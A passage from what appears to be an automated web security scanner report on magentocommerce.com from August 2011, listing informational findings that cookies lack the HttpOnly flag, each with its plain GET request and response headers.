Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.151. http://www.magentocommerce.com/system-requirements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.152. http://www.magentocommerce.com/trackback/2509/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2509/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2509/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176658; expires=Sat, 11-Aug-2012 15:17:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:38 GMT
Content-Length: 0

4.153. http://www.magentocommerce.com/trackback/2555/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2555/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2555/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176646; expires=Sat, 11-Aug-2012 15:17:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:26 GMT
Content-Length: 0

4.154. http://www.magentocommerce.com/trackback/2556/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2556/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2556/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176647; expires=Sat, 11-Aug-2012 15:17:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:27 GMT
Content-Length: 0

4.155. http://www.magentocommerce.com/trackback/2557/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2557/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176649; expires=Sat, 11-Aug-2012 15:17:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:30 GMT
Content-Length: 0

4.156. http://www.magentocommerce.com/trackback/2571/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2571/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2571/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176645; expires=Sat, 11-Aug-2012 15:17:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:25 GMT
Content-Length: 0

4.157. http://www.magentocommerce.com/trackback/323/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/323/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/323/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176669; expires=Sat, 11-Aug-2012 15:17:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:49 GMT
Content-Length: 0

4.158. http://www.magentocommerce.com/trackback/383/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/383/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/383/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176675; expires=Sat, 11-Aug-2012 15:17:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:56 GMT
Content-Length: 0

4.159. http://www.magentocommerce.com/trackback/446/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/446/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/446/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176671; expires=Sat, 11-Aug-2012 15:17:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:51 GMT
Content-Length: 0

4.160. http://www.magentocommerce.com/trackback/561/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/561/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/561/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176666; expires=Sat, 11-Aug-2012 15:17:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:46 GMT
Content-Length: 0

4.161. http://www.magentocommerce.com/trackback/625/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/625/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/625/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176667; expires=Sat, 11-Aug-2012 15:17:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:47 GMT
Content-Length: 0

4.162. http://www.magentocommerce.com/trackback/713/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/713/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/713/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176654; expires=Sat, 11-Aug-2012 15:17:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:34 GMT
Content-Length: 0

4.163. http://www.magentocommerce.com/trackback/892/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/892/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/892/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176650; expires=Sat, 11-Aug-2012 15:17:30 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:30 GMT
Content-Length: 0

4.164. http://www.magentocommerce.com/translations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.165. http://www.magentocommerce.com/ua  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.166. http://www.magentocommerce.com/vi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.167. http://www.magentocommerce.com/virtual/download-magento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.168. http://www.magentocommerce.com/virtual/enterprise-register/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
